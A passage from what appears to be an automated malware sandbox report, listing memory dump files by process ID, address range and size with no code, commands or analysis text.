memory/3372-230-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3372-219-0x000001D48C5B0000-0x000001D48C5D0000-memory.dmpFilesize
128KB
-
memory/3372-214-0x000000014036EAC4-mapping.dmp
-
memory/3372-232-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3372-215-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3372-213-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3464-172-0x0000000000000000-mapping.dmp
-
memory/3492-209-0x0000000000000000-mapping.dmp
-
memory/3512-211-0x0000000000000000-mapping.dmp
-
memory/3572-141-0x0000000000000000-mapping.dmp
-
memory/3584-210-0x0000000000000000-mapping.dmp
-
memory/3628-207-0x000001C85E9B0000-0x000001C85E9B7000-memory.dmpFilesize
28KB
-
memory/3628-231-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/3628-208-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/3636-169-0x0000000000000000-mapping.dmp
-
memory/3684-138-0x0000000000000000-mapping.dmp
-
memory/3744-205-0x0000000000000000-mapping.dmp
-
memory/3760-198-0x000002373B720000-0x000002373B732000-memory.dmpFilesize
72KB
-
memory/3760-217-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/3760-181-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/3792-224-0x0000000000000000-mapping.dmp
-
memory/3844-201-0x0000000000000000-mapping.dmp
-
memory/3888-192-0x0000000000000000-mapping.dmp
-
memory/3908-151-0x0000000000000000-mapping.dmp
-
memory/3916-145-0x0000000000000000-mapping.dmp
-
memory/4044-203-0x0000000000000000-mapping.dmp
-
memory/4108-206-0x0000000000000000-mapping.dmp
-
memory/4112-225-0x0000000000000000-mapping.dmp
-
memory/4260-146-0x0000000000000000-mapping.dmp
-
memory/4264-167-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/4264-162-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/4472-155-0x0000000000000000-mapping.dmp
-
memory/4472-160-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/4472-159-0x00007FFDE5230000-0x00007FFDE5CF1000-memory.dmpFilesize
10.8MB
-
memory/4552-144-0x0000000000000000-mapping.dmp
-
memory/4732-176-0x0000000000000000-mapping.dmp
-
memory/4752-173-0x0000000000000000-mapping.dmp
-
memory/4816-177-0x0000000000000000-mapping.dmp
-
memory/4820-139-0x0000000000000000-mapping.dmp
-
memory/4828-229-0x0000000000000000-mapping.dmp
-
memory/5032-222-0x0000000000000000-mapping.dmp
-
memory/5040-212-0x0000000000000000-mapping.dmp